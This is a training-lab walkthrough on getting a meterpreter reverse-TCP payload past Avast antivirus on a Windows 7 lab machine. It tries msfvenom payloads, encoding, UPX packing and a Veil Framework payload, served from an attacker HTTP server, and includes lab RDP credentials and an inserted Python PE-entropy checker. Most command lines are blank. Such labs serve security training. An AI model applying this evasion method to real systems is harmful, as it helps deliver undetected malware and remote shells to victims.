Bypassing AV
Overview
In this lab, you will learn to bypass a popular antivirus product, Avast, on a Windows 7 target.
Lab Environment
In this lab environment, the user gets access to a Kali GUI instance. A Windows 7 machine at IP address 172.16.5.10 can be reached with the tools installed on Kali.
Objective: Bypass the latest version of Avast AV.
Instructions
Use the following credentials to connect to the Windows machine over RDP:
Username: aline
Password: soccer

Tools
The best tools for this lab are:
Veil Framework
UPX
rdesktop
A web browser
Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!
Solution
Step 1: Open the lab link to access the Kali GUI instance.

Step 2: Check if the provided target machine is reachable.
Command:

The target machine is reachable.
Step 3: Check for open ports on the target machine.
Command:

Notice that port 3389 (RDP) is open on the target machine.
Step 4: Connect to the Windows machine over RDP.
Use the following command to connect to the provided Windows machine over RDP:
Command:

Once the connection is established, you should get access to the Windows 7 machine:

Step 5: Check if Avast AV is running.
On the provided Windows 7 machine, Avast AV is running:

Step 6: Generate reverse TCP payload.
Now let's generate a reverse TCP payload which we will then send to the Windows machine.
Check the IP address of the attacker machine:
Command:

The IP address of the attacker machine is 172.16.5.101.
Generate reverse TCP payload using msfvenom:
Command:

The payload file has been generated!
Notice that it is a 32-bit PE executable (a Windows executable).
Step 7: Start an HTTP server on the attacker machine.
We will run a Python-based HTTP server on the attacker machine:
Command:

Now we can serve the payload executables to the Windows machine.
Step 8: Start a reverse TCP handler on the attacker machine.
Open another terminal and start a reverse TCP handler using the following commands:
Commands:

Step 9: Download the payload on the Windows machine.
Head over to the Windows machine and open the following URL:
URL: http://172.16.5.101/rTCP.exe

The download fails:

Avast has detected and blocked the malicious file:

Step 10: Temporarily disable the Avast AV.
Let's disable the Avast AV for a moment and try out the payload.
Click on the hidden icons button at the bottom:

Notice that Avast is currently running:
Disabling Avast AV:
Double click on the icon for Avast (orange icon):

That would open the Avast AV application window.
In this application window, click on the Menu option on the top:

Select Settings:

Select Protection > Core Shields:

There you should notice the Core Shields toggle button:

Click on it to disable the Avast AV protection.
Select Until I turn it on again option:

Click on the OK, STOP button:

After these steps, Avast is disabled until it is turned on again.

Step 11: Download and execute the malicious executable.
Now with the Avast AV disabled, let's see if the malicious executable would be downloaded or not.
Open the following URL:
URL: http://172.16.5.101/rTCP.exe

This time the file is successfully downloaded:

Now that it's successfully downloaded, we can run it:

After running the executable, head over to the terminal where the reverse TCP handler was running (on the attacker machine):

Notice that we got back a meterpreter session on the target machine.
Now we can run commands on the target Windows machine:
Command:

Let's launch a calculator, just for demonstration purposes:
Command:

Check the Windows desktop:

A calculator instance was indeed launched!
Before proceeding to the next step, exit the meterpreter shell session and restart the reverse TCP handler:
Command:

Step 12: Enable and bypass Avast AV.
Enable Avast AV by toggling the Core Shields button:

We know that the Avast AV detected the rTCP.exe payload, so let's generate an encoded payload using the following command:
Command:

Check the file type:
Command:

It's a 32-bit PE executable (a Windows executable).
Download the encoded payload file (on Windows machine):
URL: http://172.16.5.101/rTCPenc.exe

Avast AV also blocked this file:

So the downloading failed!

Let's use UPX packer on the encoded executable:
Command:

Download the encoded and packed payload file (on Windows machine):
URL: http://172.16.5.101/rTCPenc2.exe

Avast AV detected this encoded and packed payload as well:

So the file download failed again!

So none of the msfvenom-generated payloads bypassed Avast: the plain reverse TCP executable, the encoded version, and the encoded-and-UPX-packed version were all detected.
Let's use the Veil Framework and generate a reverse TCP payload:
Command:

We will use Veil's Evasion tool:
Command:

List the available payloads:
Command:

Locate the python/meterpreter/rev_tcp.py payload:

It's located at number 28. Select that payload:
Command:

For this payload, we will specify the LHOST and LPORT values and generate the payload:
Commands:
Specify the resulting payload file name as rTCPveil.

We will be using PyInstaller to create the payload executable:

In a few seconds, the payload would be generated:

Press Enter, then type the exit command to leave the Veil Framework:

Copy the payload file to /root (the directory where the Python-based HTTP server is running):
Commands:

Notice that the Veil Framework generated a 32-bit PE executable (a Windows executable).
Download the payload executable on the Windows machine via the following URL:
URL: http://172.16.5.101/rTCPveil.exe

Avast detected the executable and quarantined it:

So the file download failed again!

Pack the file using UPX:
Command:

Notice that the resulting executable rTCPveil2.exe is a UPX compressed PE32 executable!
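Several steps above rely on checking what was actually produced (a 32-bit PE, and here a UPX-packed PE32) before sending it to the target. The following is an added example, not part of the original lab, that performs that check offline in Python: it parses the DOS, COFF and optional headers and the section table of a PE image, reports whether the file is PE32 or PE32+ and x86 or x64, flags the UPX0/UPX1 section names that UPX leaves behind, and computes per-section Shannon entropy, which is the more robust packing indicator because section names are trivially renamed. The two sample images are constructed inline for the example (headers plus filler bytes only, not runnable code and not the lab's payloads); on the real lab files you would call inspect_pe() on the bytes of rTCPveil.exe and rTCPveil2.exe.

```python
import math
import random
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
OPT_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~0 for constant data, close to 8 for compressed/encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_pe(data: bytes) -> dict:
    """Parse the DOS header, PE signature, COFF header, optional header magic and section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # COFF header (20 bytes) follows the PE signature
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    machine_name = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}.get(machine, hex(machine))
    sections = []
    off = e_lfanew + 24 + opt_size          # section table starts after the optional header
    for _ in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 2),
        })
        off += 40                            # each IMAGE_SECTION_HEADER is 40 bytes
    return {
        "arch": OPT_MAGIC.get(opt_magic, "unknown"),
        "machine": machine_name,
        "sections": sections,
        "upx_packed": any(s["name"].startswith("UPX") for s in sections),
        "max_entropy": max((s["entropy"] for s in sections), default=0.0),
    }


def build_test_pe(sections, machine=IMAGE_FILE_MACHINE_I386) -> bytes:
    """Constructed minimal PE32 image for this example: valid headers, filler section bytes."""
    opt_size = 224                           # size of a PE32 optional header
    e_lfanew = 0x40
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table, body, raw_ptr = b"", b"", headers_len
    for name, payload in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(payload), 0x1000,
                             len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += payload
        raw_ptr += len(payload)
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed samples: an unpacked layout with low-entropy filler, and a UPX-style layout
# (empty UPX0, dense UPX1) whose filler is pseudo-random to mimic compressed data.
_rng = random.Random(7)
SAMPLE_PLAIN = build_test_pe([(b".text", b"\x90" * 2048 + b"\xc3"), (b".data", b"A" * 512)])
SAMPLE_PACKED = build_test_pe([
    (b"UPX0", b""),
    (b"UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
    (b".rsrc", b"\0" * 64),
])

if __name__ == "__main__":
    for label, image in (("plain", SAMPLE_PLAIN), ("packed", SAMPLE_PACKED)):
        info = inspect_pe(image)
        print(label, info["arch"], info["machine"],
              "UPX sections present" if info["upx_packed"] else "no UPX sections",
              [(s["name"], s["entropy"]) for s in info["sections"]])
```

The section-name check reproduces what `file` reports as "UPX compressed" in the lab; the entropy column is the check to keep when a packer has been configured to rename its sections, since compressed or encrypted payload data stays near 8 bits per byte regardless of the name.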
Download the rTCPveil2.exe executable on the Windows machine:
URL: http://172.16.5.101/rTCPveil2.exe

The UPX compressed file is successfully downloaded:

Execute the payload file:

That should get back a meterpreter shell session!

Now we can run commands on the target Windows machine:
Command:

Check if Avast is still running:
Command:

Avast AV is running on the machine.
Launch calc.exe on Windows machine:
Command:

Head back to the Windows machine:

Notice that a calculator instance is running on the Windows machine!
Also, if you check Avast AV, its Core Shield is still enabled:

So that was all about bypassing the latest Avast AV on a Windows 7 machine!
In this lab, we went through several failed attempts before a final successful bypass of Avast. The same approach applies to other AV products: mutate the payload with different techniques (an alternative generator such as Veil, encoding, packing with UPX, and combinations of these) and test each variant against the target product. Note that no single mutation worked on its own here; the msfvenom output stayed detected even after encoding and packing, and the Veil payload was still caught until it was UPX-packed. Because AV products differ in how they detect, and their signatures are updated over time, bypassing several products, or the same product after an update, may take considerably more effort. This lab should nevertheless give you a taste of what it takes to bypass an AV.